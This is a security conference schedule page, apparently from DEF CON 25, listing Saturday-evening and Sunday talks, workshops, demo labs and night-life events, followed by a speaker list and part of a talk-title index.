WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

Saturday - 17:00

BHV - Pisa Room - The Brave New World of Bio-Entrepreneurship - Jun Axup
BHV - Pisa Room - (17:30-17:59) - The collision of prosthetics, robotics and the human interface - Randall Alley
BillW - Office 4A on Promenade Level - Friends of Bill W
CHV - Village Talks Outside Contest Area, Pool Level - cont...(16:30-17:30) - The Bicho: An Advanced Car Backdoor Maker - Sheila Ayelen Berta
CPV - Florentine Ballroom 4 - Blue Team TLS Hugs - Lee Brotherston
CPV - Florentine Ballroom 4 - (17:30-18:00) - Automated Testing using Crypto Differential Fuzzing (DO NOT RECORD) - Yolan Romailler
DC - Track 1 - Here to stay: Gaining persistency by abusing advanced authentication mechanisms - Marina Simakov, Igal Gofman
DC - Track 2 - Taking Windows 10 Kernel Exploitation to the next level - Leveraging write-what-where vulnerabilities in Creators Update - Morten Schenk
DC - Track 3 - Introducing HUNT: Data Driven Web Hacking & Manual Testing - Jason Haddix
DC - Track 4 - Popping a Smart Gun - Plore
DL - Table 1 - cont...(16:00-17:50) - Advanced Spectrum Monitoring with ShinySDR - Michael Ossmann, Dominic Spill
DL - Table 2 - cont...(16:00-17:50) - DNS-Exfil-Suite - Nolan Berry, Cory Schwartz
DL - Table 3 - cont...(16:00-17:50) - CellAnalysis - Pedro Cabrera
DL - Table 4 - cont...(16:00-17:50) - Universal Serial aBUSe - Rogan Dawes
DL - Table 5 - cont...(16:00-17:50) - EAPHammer - Gabriel Ryan
DL - Table 6/Five - cont...(16:00-17:50) - ShinoBOT Family - Sh1n0g1
IOT - Main Contest Area - (17:40-18:30) - Manufacturers Panel - TBA
PHV - Milano VIII - Promenade Level - Hunting Down the Domain Admin and Rob Your Network - Keith Lee and Michael Gianarakis
PHV - Milano VIII - Promenade Level - (17:40-17:59) - Strengthen Your SecOps Team by Leveraging Neurodiversity - Megan Roddie
PHW - Neopolitan BR IV - Promenade Level - cont...(16:30-17:59) - Serious Intro to Python for Admins - David Potts
RCV - Palermo room, Promenade level - cont...(16:00-17:59) - Intro to OSINT: Zero on the way to Hero - Joe Gray
SEV - Emperors BR II - cont...(16:55-17:25) - Are you Killing your security program? - Michele Fincher
SEV - Emperors BR II - (17:30-18:20) - ….Not lose the common touch - Billy Boatright
SKY - Verona/Tuin/Trevi - Promenade Level - Everything you wanted to know about orchestration but were afraid to ask. - redbeard
WV - Florentine BR I & II - Promenade Level - GODUMP-NG packet sniffing the Gotenna - Woody and Tim Kuester
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principles on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 18:00


Return to Index  -  Locations Legend
BHV - Pisa Room - The Rise of Digital Medicine: At-home digital clinical research - Andrea Coravos
BHV - Pisa Room - (18:30-18:30) - Designer Babies - Christian and Erin
IOT - Main Contest Area - cont...(17:40-18:30) - Manufacturers Panel - TBA
Night Life - Counsel Boardroom, Promenade Level - Lawyer Meetup -
PHV - Milano VIII - Promenade Level - Passwords on a Phone - Sam Bowne
PHW - Neopolitan BR IV - Promenade Level - (18:15-19:30) - Advanced Implant Detection with Bro & PacketSled - PacketSled
SEV - Emperors BR II - cont...(17:30-18:20) - ….Not lose the common touch - Billy Boatright
SEV - Emperors BR II - (18:25-19:15) - How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises) - Jayson Street
WV - Florentine BR I & II - Promenade Level - A Pineapple, a Turtle, a Bunny, and a Squirrel walk into a bar. - Darren Kitchen and Seb Kinne
WS - Octavius 1 - cont...(14:30-18:30) - Hacking Network Protocols using Kali - Thomas Wilhelm, John Spearing
WS - Octavius 4 - cont...(14:30-18:30) - Principles on Leveraging PowerShell for Red Teams - Carlos Perez
WS - Octavius 5 - cont...(14:30-18:30) - Exploitation/Malware Forward Engineering - Sean Dillon, Zachary Harding
WS - Octavius 6 - cont...(14:30-18:30) - Pwning machine learning systems - Clarence Chio, Anto Joseph
WS - Octavius 7 - cont...(14:30-18:30) - Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics - Anshuman Bhartiya, Anthony Bislew

 

Saturday - 19:00


Return to Index  -  Locations Legend
PHW - Neopolitan BR IV - Promenade Level - cont...(18:15-19:30) - Advanced Implant Detection with Bro & PacketSled - PacketSled
SEV - Emperors BR II - cont...(18:25-19:15) - How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises) - Jayson Street
SEV - Emperors BR II - (19:15-20:05) - Change Agents: How to Effectively Influence Intractable Corporate Cultures - Keith Conway

 

Saturday - 20:00


Return to Index  -  Locations Legend
DC - Capri Room - Panel - Meet the Feds (who care about security research) - Allan Friedman, Amélie E. Koran, Leonard Bailey, Nick Leiserson, Kimber Dowsett
DC - Modena Room - D0 No H4RM: A Healthcare Security Conversation - Christian "quaddi" Dameff MD MS, Jeff "r3plicant" Tully MD, Beau Woods, Joshua Corman, Michael C. McNeil, Jay Radcliffe, Suzan
Night Life - Roman 1, Promenade Level - Hacker Karaoke -
Night Life - Track 2 - Hacker Jeopardy -
Night Life - Track 3 - (20:30-24:00) - DEF CON Movie Night -
Night Life - Track 4 - Whose Slide is it anyway? -
SEV - Emperors BR II - cont...(19:15-20:05) - Change Agents: How to Effectively Influence Intractable Corporate Cultures - Keith Conway
SEV - Emperors BR II - Social Engineering with Web Analytics - Tyler Rosonke

 

Saturday - 21:00


Return to Index  -  Locations Legend
DC - Capri Room - cont...(20:00-21:59) - Panel - Meet the Feds (who care about security research) - Allan Friedman, Amélie E. Koran, Leonard Bailey, Nick Leiserson, Kimber Dowsett
DC - Modena Room - cont...(20:00-21:59) - D0 No H4RM: A Healthcare Security Conversation - Christian "quaddi" Dameff MD MS, Jeff "r3plicant" Tully MD, Beau Woods, Joshua Corman, Michael C. McNeil, Jay Radcliffe, Suzan
Night Life - Octavius 3&4 - Blanketfort Con -
Night Life - Octavius 5-8 - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: MODERNS -
Night Life - Track 2 - cont...(20:00-24:00) - Hacker Jeopardy
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?
SEV - Emperors BR II - cont...(20:10-20:40) - Social Engineering with Web Analytics - Tyler Rosonke

 

Saturday - 22:00


Return to Index  -  Locations Legend
Night Life - Octavius 1&2 - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: JACKALOPE -
Night Life - Track 2 - Drunk Hacker History -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?

 

Saturday - 23:00


Return to Index  -  Locations Legend
IOT - Main Contest Area - (23:30-24:20) - IoT updates to help protect consumers - Aaron Alva @aalvatar & Mark Eichorn of the FTC
Night Life - Octavius 1&2 - cont...(22:00-26:00) - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: ZEBBLER ENCANTI -
Night Life - Track 1 & Chillout lounges - (23:30-24:00) - Official Entertainment: LEFT/RIGHT -
Night Life - Track 2 - cont...(20:00-24:00) - Drunk Hacker History
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night
Night Life - Track 4 - cont...(20:00-24:00) - Whose Slide is it anyway?

 

Saturday - 24:00


Return to Index  -  Locations Legend
IOT - Main Contest Area - cont...(23:30-24:20) - IoT updates to help protect consumers - Aaron Alva @aalvatar & Mark Eichorn of the FTC
Night Life - Octavius 1&2 - cont...(22:00-26:00) - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - Official Entertainment: KILL THE NOISE -

 

Saturday - 25:00


Return to Index  -  Locations Legend
Night Life - Octavius 1&2 - cont...(22:00-26:00) - Human Zoo -
Night Life - Octavius 3&4 - cont...(21:00-26:00) - Blanketfort Con -
Night Life - Octavius 5-8 - cont...(21:00-26:00) - GRIMM's AWESOME Arcade Party -
Night Life - Roman 1, Promenade Level - cont...(20:00-26:00) - Hacker Karaoke
Night Life - Track 1 & Chillout lounges - (25:30-26:00) - Official Entertainment: CTRL/RSM -

 

Sunday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Sunday - 10:00


Return to Index  -  Locations Legend
DC - Track 1 - Unboxing Android: Everything you wanted to know about Android packers - Avi Bashan, Slava Makkaveev
DC - Track 2 - I Know What You Are by the Smell of Your Wifi - Denton Gentry
DC - Track 2 - (10:20-10:40) - PEIMA (Probability Engine to Identify Malicious Activity): Using Power Laws to address Denial of Service Attacks - Redezem
DC - Track 3 - Breaking Bitcoin Hardware Wallets - Josh Datko, Chris Quartier
DC - Track 3 - (10:20-10:40) - BITSInject - Dor Azouri
DC - Track 4 - Untrustworthy Hardware and How to Fix It - 0ctane
DC - Track 4 - (10:20-10:40) - Ghost in the Droid: Possessing Android Applications with ParaSpectre - chaosdata
DL - Table 1 - probespy - stumblebot
DL - Table 2 - Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes - Takahiro Yoshimura (alterakey), Ken-ya Yoshimura (ad3liae)
DL - Table 3 - GoFetch - Tal Maor
DL - Table 4 - Leviathan Framework - Utku Sen, Ozge Barbaros
DL - Table 5 - WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 6 - HI-Jack-2Factor - Weston Hecker
IOT - Main Contest Area - Intelligent Misusers: A Case for Adversarial Modelling on IoT Devices - Pishu Mahtani @pishumahtani
RCV - Palermo room, Promenade level - Building Google For Criminal Enterprises - Anthony
RCV - Palermo room, Promenade level - (10:35-11:25) - FERPA: Only Your Grades Are Safe; OSINT In Higher Education - Leah
SKY - Verona/Tuin/Trevi - Promenade Level - HUMSEC (or how I learned to hate my phone) - amarok

 

Sunday - 11:00


Return to Index  -  Locations Legend
BHV - Pisa Room - The Future is Fake Identities - Paul Ashley
BHV - Pisa Room - (11:30-11:59) - Might as well name it Parmigiana, American, Cheddar, and Swiss - Ken Belva
CPV - Florentine Ballroom 3 - WS: Reasoning about Consensus Algorithms - Zaki Manian
CPV - Florentine Ballroom 4 - (11:30-12:00) - Cypherpunks History - Ryan Lackey
DC - Track 1 - Total Recall: Implanting Passwords in Cognitive Memory - Tess Schrodinger
DC - Track 2 - Backdooring the Lottery and Other Security Tales in Gaming over the Past 25 Years - Gus Fritschie, Evan Teitelman
DC - Track 3 - Exploiting Continuous Integration (CI) and Automated Build systems - spaceB0x
DC - Track 4 - 'Ghost Telephonist' Impersonates You Through LTE CSFB - Yuwei Zheng, Lin Huang
DL - Table 1 - cont...(10:00-11:50) - probespy - stumblebot
DL - Table 2 - cont...(10:00-11:50) - Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes - Takahiro Yoshimura (alterakey), Ken-ya Yoshimura (ad3liae)
DL - Table 3 - cont...(10:00-11:50) - GoFetch - Tal Maor
DL - Table 4 - cont...(10:00-11:50) - Leviathan Framework - Utku Sen, Ozge Barbaros
DL - Table 5 - cont...(10:00-11:50) - WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 6 - cont...(10:00-11:50) - HI-Jack-2Factor - Weston Hecker
IOT - Main Contest Area - From FAR and NEAR: Exploiting Overflows on Windows 3.x - Jacob Thompson @isesecurity
PHV - Milano VIII - Promenade Level - Demystifying the OPM breach, WTF really happened - Ron Taylor
PHW - Neopolitan BR IV - Promenade Level - An Intro to Hunting with Splunk - Splunk
RCV - Palermo room, Promenade level - cont...(10:35-11:25) - FERPA: Only Your Grades Are Safe; OSINT In Higher Education - Leah
RCV - Palermo room, Promenade level - (11:25-11:55) - Do Tinder Bots Dream of Electric Toys? How Tinder Bots are breaking hearts all over the world, and trashing Tinder’s reputation while they’re at it. - Inbar Raz
SKY - Verona/Tuin/Trevi - Promenade Level - It's Not Just the Elections! - Malware Utkonos

 

Sunday - 12:00


Return to Index  -  Locations Legend
BHV - Pisa Room - How to use the Scientific Method in Security Research - Jay Radcliffe
BillW - Office 4A on Promenade Level - Friends of Bill W -
CPV - Florentine Ballroom 4 - The Key Management Facility of the Root Zone DNSSEC KSK - Punky Duero
CPV - Florentine Ballroom 4 - (12:30-13:30) - The Policy & Business Case for Privacy By Design - Zerina Curevac
DC - Track 1 - The Black Art of Wireless Post Exploitation - Gabriel "solstice" Ryan
DC - Track 2 - Are all BSDs created equally? A survey of BSD kernel vulnerabilities. - Ilja van Sprundel
DC - Track 3 - The call is coming from inside the house! Are you ready for the next evolution in DDoS attacks? - Steinthor Bjarnason, Jason Jones
DC - Track 4 - Genetic Diseases to Guide Digital Hacks of the Human Genome: How the Cancer Moonshot Program will Enable Almost Anyone to Crash the Operating System that Runs You or to End Civilization... - John Sotos
DL - Table 1 - WiMonitor - an OpenWRT package for remote WiFi sniffing - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 2 - Gumbler - Willis Vandevanter
DL - Table 3 - PCILeech - Ulf Frisk
DL - Table 4 - WiFi Cactus - darkmatter
DL - Table 6 - Vapor Trail - Galen Alderson, Larry Pesce
DL - Table 6/Five - ShinoBOT Family - Sh1n0g1
PHV - Milano VIII - Promenade Level - Go Beyond Tabletop Scenarios by Building an Incident Response Simulation Platform - Eric Capuano
PHW - Neopolitan BR IV - Promenade Level - cont...(11:00-12:30) - An Intro to Hunting with Splunk - Splunk
SKY - Verona/Tuin/Trevi - Promenade Level - The Automation and Commoditization of Infosec - Joshua Marpet and Scott Lyons

 

Sunday - 13:00


Return to Index  -  Locations Legend
BHV - Pisa Room - How your doctor might be trying to kill you and how personal genomics can save your life - dlaw and razzies
BHV - Pisa Room - (13:30-13:59) - Neuro Ethics - Dr. Stanislav Naydin and Vlad Gostomelsky
CPV - Florentine Ballroom 4 - cont...(12:30-13:30) - The Policy & Business Case for Privacy By Design - Zerina Curevac
CPV - Florentine Ballroom 4 - (13:30-14:00) - The Why and How for Secure Automatic Patch Management - Scott Arciszewski
DC - Track 1 - Game of Chromes: Owning the Web with Zombie Chrome Extensions - Tomer Cohen
DC - Track 2 - Bypassing Android Password Manager Apps Without Root - Stephan Huber, Siegfried Rasthofer
DC - Track 3 - Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs - Thomas Mathew, Dhia Mahjoub
DC - Track 4 - Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science - Daniel Bohannon (DBO), Lee Holmes
DL - Table 1 - cont...(12:00-13:50) - WiMonitor - an OpenWRT package for remote WiFi sniffing - Vivek Ramachandran, Nishant Sharma, Ashish Bhangale
DL - Table 2 - cont...(12:00-13:50) - Gumbler - Willis Vandevanter
DL - Table 3 - cont...(12:00-13:50) - PCILeech - Ulf Frisk
DL - Table 4 - cont...(12:00-13:50) - WiFi Cactus - darkmatter
DL - Table 6 - cont...(12:00-13:50) - Vapor Trail - Galen Alderson, Larry Pesce
DL - Table 6/Five - cont...(12:00-13:50) - ShinoBOT Family - Sh1n0g1
PHV - Milano VIII - Promenade Level - Stories from a 15 days SMB Honeypot: Mum, Tons of WannaCry and Evils Attacked Our Home! - Tan Kean Siong
PHW - Neopolitan BR IV - Promenade Level - Introduction to 802.11 Packet Dissection - Megumi Takeshita
SKY - Verona/Tuin/Trevi - Promenade Level - Robbing the network and ways to get there - Keith & Jerel "Low rent Nickerson"

 

Sunday - 14:00


Return to Index  -  Locations Legend
BHV - Pisa Room - Biohacking Street Law - Victoria Sutton
CPV - Closing
DC - Track 1 - Call the plumber - you have a leak in your (named) pipe - Gil Cohen
DC - Track 2 - Weaponizing Machine Learning: Humanity Was Overrated Anyway - Dan "AltF4" Petro, Ben Morris
DC - Track 3 - Man in the NFC - Haoqi Shan, Jian Yuan
DC - Track 4 - Friday the 13th: JSON attacks! - Alvaro Muñoz, Oleksandr Mirosh
PHW - Neopolitan BR IV - Promenade Level - cont...(13:00-14:30) - Introduction to 802.11 Packet Dissection - Megumi Takeshita

 

Sunday - 15:00


Return to Index  -  Locations Legend
DC - Track 1 - DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd - Representative James Langevin, Representative Will Hurd, Joshua Corman
DC - Track 1 - 25 Years of Program Analysis - Zardus (Yan Shoshitaishvili)

 

Sunday - 17:00


Return to Index  -  Locations Legend
BillW - Office 4A on Promenade Level - Friends of Bill W -

Speaker List


Dan "AltF4" Petro
David Huerta
Eden Shochat
Inbar Raz
"Snide" Owen
[anonymous panel]
@h0tdish
@mickmoran
#BadgeLife Badge Makers
0ctane
0x00string
303
5A1F
Aardvark
Aaron Alva
Aaron Guzman
Abhay Bhargav
Abhijeth Dugginapeddi
Abhijeth
Adam Steed
Aditya Gupta
Ajit Hatti
Ajit Hatti
Alan Orlikoski
Aleph-Naught-
Alex "Jay" Balan
Alex Kahan
Alexander Zakharov
Alexey Ermishkin
algorythm
Alisha Kloc
Allan Friedman
Alvaro Muñoz
Amanda Plimpton
amarok
Amit Elazari
Amit Klein
Anant Shrivastava
Andrea Coravos
Andrea Matwyshyn
Andreas Dewes
Andrew 'r0d3nt' Strutt
Andrew 'r0d3nt' Strutt
Andrew Allen
Andrew Brandt
Andrew Hay
Andrew Tierney
Andy Robbins
Ankur Tyagi
Anshuman Bhartiya
Anthony Bislew
Anthony Singleton
Anthony
Anto Joseph
Antriksh Shah
Arnaud Soullie
Artem Kondratenko
Ashish Bangale
Ashish Bhangale
Ashish Bhangale
Ashish Bhangale
Atlas
Audie
Avi Bashan
Awesome Folks from Various BioHacking Podcasts
Ayoul3
B1TKILL3R
Balint Seeber
Barbara Simons
BASIM ALTINOK
Beau Woods
Ben Morris
Billy Boatright
Blake Johnson
Brad Pierce
Brandon Dixon
Brent White
Brian Knopf
Brute Logic
Bryan Gillispie
Bryan Passifiume
Bryce Kunz @TweekFawkes
Bryson Bort
c00p3r
Caezar
Caleb Madrigal
Candice Hoke
Carlos Perez
Catherine J. Ullman
ceyx
chaosdata
Charles Tritt
Cheng
Cheryl Biswas
Chet Hosmer
Chet Hosmer
Chris Castellano
Chris Eagle
Chris Frenz
Chris Grayson
Chris Hadnagy
Chris Quartier
Chris Roberts
Chris Sistrunk
Chris Thompson
Chris Wysopal
Christian "quaddi" Dameff MD MS
Christian Heinrich
Christian
Christopher Domas
Christopher Williams
Chuck Easttom
CINCVolFLT
CJ_000
Clarence Chio
Cooper Quintin
Corey Theun
Cory Doctorow
Cory Schwartz
Cory
Cosmo Mielke
Craig Young
Dakota Nelson
Dakota Nelson
Damien "virtualabs" Cauquil
Damon Small
Dan Cvrcek
Dan M.
Dan Regalado
Daniel Adinolfi
Daniel Bohannon (DBO)
Daniel Crowley
Dark Tangent
Dark Tangent
darkmatter
Darkmatter
Darren Kitchen
Darren
David "Karit" Robinson
David Bach
David Hulton
David Jefferson
David Latimer
David Potts
David Wong
Davin Potts
DazzleCatDuo
Deirdre Connolly
Dennis Maldonado
Denton Gentry
Deral Heiland
Devin Duffy-Halseth
Dhia Mahjoub
Dimitry Snezhkov
Dinesh Shetty
dlaw
Dmitry Dain
Dominic Spill
Dominic Spill
Dor Azouri
Dr. Stanislav Naydin
Dr. Suzanne Schwartz
Dr. Suzanne Schwartz
Duo Security
Dylan James Smith
Ed You
Eijah
El Kentaro
Elie Bursztein
Eric Capuano
Eric Capuano
Eric Escobar
Erik Kamerling
Erin
Etienne Stalmans
Eva Galperin
Evan Anderson
Evan Johnson
Evan Teitelman
Evgeny Sidorov
Fahey Owens
Felix Brezo
Francis Brown
FuzzyNop
Gabriel "solstice" Ryan
Gabriel Ryan
Gabriel Ryan
Gabriel Ryan
Galen Alderson
Garry Kasparov
General Douglas Lute
George Tankersley
Gerald Steere
Gil Cohen
Gilberto Bertin
Gingerbread
ginsback
Gita Ziabari
Grifter
Guillermo Buendia
Gus Fritschie
H0m3l3ss
Hanno Böck
Haoqi Shan
Harri Hurst
Harri Hurst
Hawaii John
Helen Thackray
HighWiz
Hyrum Anderson
Ian Foster
Igal Gofman
Ilja van Sprundel
Inbar Raz
INFOSEC UNLOCKED
Invisigoth
IOActive
Itzik Kotler
J0N J4RV1S
Jack Mott
Jack64
Jacob Thompson
Jake Williams
Jason Haddix
Jason Haddix
Jason Hernandez
Jason Jones
Jason Staggs
Jason Williams
Jay Beale
Jay Beale
Jay Beale
Jay Radcliffe
Jay Radcliffe
Jayson E. Street
Jayson Street
Jcran
Jeff "r3plicant" Tully MD
Jeff Quesnelle
Jeffrey Tibbetts
Jen
Jerel
Jeremy Heffner
Jerod MacDonald-Evoy
Jerry Gamblin
Jesse Michael
Jian Yuan
Jim Nitterauer
Jiva
Joe FitzPatrick
Joe FitzPatrick
Joe Gray
Joe Rozner
Joe Stirland and Kevin Jones
Joe Weiss
Joel Wallenstrom
John Bass
John Ives
John Nye
John Poulin
John Sotos
John Spearing
Jon Medina
Joseph Birr-Pixton
Joseph Hall
Joseph Hall
Josh Datko
Josh Pitts
Joshua Corman
Joshua Corman
Joshua Marpet
Joshua Montgomery
Julian Dana
Julian Dana
Jun Axup
Jun Li
Justin Montalbano
K2
Kashmir Hill
Keith Conway
Keith Lee
Keith Lee
Keith
Ken Belva
Ken Munro
Ken Munro
Ken-ya Yoshimura (ad3liae)
Kenneth Geers
Keoni Gandall
Kevin Hulin
Kevin Sacco
Kit Walsh
Konstantinos Karagiannis
Kurt Opsahl
Lalith Rallabhandi
Lane Thames
Larry Pesce
Larry Vandenaweele
Lauren Rucker
Leah Figueroa
Leah Figueroa
Leah
Lee Brotherston
Lee Holmes
Lee Holmes
Leonard Bailey
Leonard Bailey
Lin Huang
Logan Lamb
Louis Auguste
Luke Young
Major Malfunction
Malware Unicorn
Malware Unicorn
Malware Utkonos
Manfred (@_EBFE)
Marc Newlin
Marc Newlin
Marcello Salvati
Marcelo Mansur
Marek Majkowski
Marina Simakov
Mark Eichorn
Mark Mager
Mati Aharoni
Matt 'openfly' Joyce
Matt Blaze
Matt Blaze
Matt Blaze
Matt Cheung
Matt Cheung
Matt Domko
Matt Knight
Matt Suiche
Matt Wixey
Matthew E. Luallen
Matthew E. Luallen
Maurice Carey
Max Bazaliy
Maxime Morin
Maximus64
Megan Roddie
Megumi Takeshita
Megumi Takeshita
Meow Ludo Meow Meow
Michael C. McNeil
Michael E. Taylor
Michael Gianarakis
Michael Hudson
Michael Leibowitz
Michael Ossmann
Michael Ossmann
Michael Ossmann
Michael T. Raggo
Michele Fincher
Mickey Shkatov
Miguel Guirao
Mike Raggo
Mike Raggo
Mikhail Sosonkin
Mikhail Sosonkin
Min (Spark) Zheng
minion
Mitch Johnson
Morten Schenk
Mr. Br!ml3y
Mr. Sean Kanuck
Mr. Sean Kanuck
Munin
Myles
Nadav Erez
Nadav Erez
Nate Cardozo
Nate Temple
Nathan Bates (@Brutes_)
Nathan Seidle
Neel Pandeya
Nick 'r@ndom' Delewski
Nick Cano
Nick Leiserson
Niki7a
Nishant Sharma
Nishant Sharma
Nishant Sharma
Nishant Sharma
Noah Praetz
Nolan Berry
Nolan
Oleksandr Bazhaniuk
Oleksandr Mirosh
Omar Eissa
Orange Tsai
Ozge Barbaros
p3n3troot0r
p3n3troot0r
PacketSled
Patrick DeSantis
Patrick McNeil
Patrick Wardle
Patrick Wardle
Paul Ashley
Pedro Cabrera
Peter Ewane
Peter Hefley
Peyton "Foofus" Engel
Philip Tully
Pishu Mahtani
Plore
Professor Plum
Punky Duero
Rafael Fontes Souza
Randall Alley
razzies
redbeard
Redezem
RenderMan
Rep. James Langevin
Rep. James Langevin
Rep. Will Hurd
Rep. Will Hurd
Rhett Greenhagen
Richard Henderson
Richard Thieme
Rick Ramgattie
Roamer
Robby Mook
Robert Ghilduta
Robert Wood
Robin Farmanfarmaian
Rogan Dawes
Roger Dingledine
Romain Coltel
Ron Taylor
Ruben Boonen
Ryan Baxendale
Ryan Lackey
Ryan Schmoll
S0ups
Salvador Mendoza
Salvador Mendoza
Sam Bowne
Sam Bowne
Sam Erb
Sam Richards
Sandy Clark
Sarah Zatko
Scott Arciszewski
Scott Behrens
Scott Lyons
Sean Dillon
Sean Metcalf
Sean Wilson
Seb Kinne
SensePost
Sergei Frankoff
Sergey Temnikov
Sh1n0g1
Shabid Buttar
Shaggy
Shane McDougal
Shea Nangle
Sheila Ayelen Berta
Siegfried Rasthofer
Simon Roses
skud
Sky
Slava Makkaveev
Sneha Rajguru
spaceB0x
Splunk
Splunk
Srinivas Rao
Steinthor Bjarnason
Stephan Huber
Steve Pordon
stryngs
stumblebot
Suggy
Svea Eckert
Syler Clayton
Takahiro Yoshimura (alterakey)
Tal Maor
Tan Kean Siong
Tarah Wheeler
TBA
TBA
Terrell McSweeny
Terrell McSweeny
Tess Schrodinger
Tess Schrodinger
Thomas Brandstetter
Thomas d'Otreppe
Thomas d'Otreppe
Thomas Mathew
Thomas Wilhelm
Tim Blute
Tim Cannon
Tim Kuester
Tim Roberts
Tom Sela
Tom Van Norman
Tom Van Norman
Tomas Susanka
Tomer Cohen
Tracy Z. Maleeff
Travis Lawrence
Trevor Goodman
Trey Forgety
trixr4skids
Tyler Rosonke
Tyler
Ulf Frisk
Utku Sen
Vasilios Mavroudis
Victoria Sutton
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vivek Ramachandran
Vlad Gostomelsky
Vlad Gostomelsky
Vlad Gostomelsky
Vladimir Dashchenko
Vulc@n
Waz
wendy
Wesley McGrew
Weston Hecker
Weston Hecker
Weston Hecker
Whitney Merrill
Will Schroeder
William Knowles
Willis Vandevanter
Wiseacre
Woody
Xiangyu Liu
XlogicX
Yaiza Rubio
Yolan Romailler
Yves Le Provost
Zachary Harding
Zaki Manian
Zardus
Zenofex
Zerina Curevac
zero-x
zerosum0x0
Zhang Yunhai

Talk List


DEFCON-Track 4- 'Ghost Telephonist' Impersonates You Through LTE CSFB
DEFCON-Track 1- 25 Years of Program Analysis
DEFCON-Track 2- Are all BSDs are created equally? A survey of BSD kernel vulnerabilities.
PHV-Milano VIII - Promenade Level- Modern Day CovertTCP with a Twist
Night Life-Chillout Lounge, Roman 3, Promenade Level-"DCG" Mixer
DEFCON-Track 4-"Tick, Tick, Tick. Boom! You're Dead." — Tech & the FTC
DEFCON-Track 4-(Un)Fucking Forensics: Active/Passive (i.e. Offensive/Defensive) memory hacking/debugging.
DEFCON-Track 2-$BIGNUM steps forward, $TRUMPNUM steps back: how can we tell if we're winning?
IOT-Main Contest Area-101 hardware hacking workshop
Night Life-Promenade level, in Skytalks room.-303 Party
Workshops-Octavius 1-A B C of Hunting
DEFCON-Track 3-A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
CPV-Florentine Ballroom 4-A New Political Era: Time to start wearing tin-foil hats following the 2016 elections?
DEFCON-Track 4-A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego
Wireless-Florentine BR I & II - Promenade Level-A Pineapple, a Turtle, a Bunny, and a Squirrel walk into a bar.
SEV-Emperors BR II-….Not lose the common touch
DEFCON-Track 4-Abusing Certificate Transparency Logs
CHV-Village Talks Outside Contest Area, Pool Level-Abusing Smart Cars with QR codes
DEFCON-Track 1-Abusing Webhooks for Command and Control
SKY-Verona/Tuin/Trevi - Promenade Level-Advanced DNS Exfil
PHW-Neopolitan BR IV - Promenade Level-Advanced Implant Detection with Bro & PacketSled
Demolabs-Table 1-Advanced Spectrum Monitoring with ShinySDR
Workshops-Octavius 7-Advanced Wireless Attacks Against Enterprise Networks
CPV-Florentine Ballroom 4-Alice and Bob are Slightly Less Confused
SKY-Verona/Tuin/Trevi - Promenade Level-All The Sales President's Men
DEFCON-Track 4-All Your Things Are Belong To Us
DEFCON-Track 1-Amateur Digital Archeology
DEFCON-Track 3-An ACE Up the Sleeve: Designing Active Directory DACL Backdoors
PHW-Neopolitan BR IV - Promenade Level-An Intro to Hunting with Splunk
PHW-Neopolitan BR IV - Promenade Level-An Intro to Hunting with Splunk
RCV-Palermo room, Promenade level-An Introduction to Graph Theory for OSINT
Demolabs-Table 3-Android Tamer
Workshops-Octavius 7-Applied Physical Attacks on Embedded Systems, Introductory Version
SEV-Emperors BR II-Are you Killing your security program?
DEFCON-Track 1-Assembly Language is Too High Level
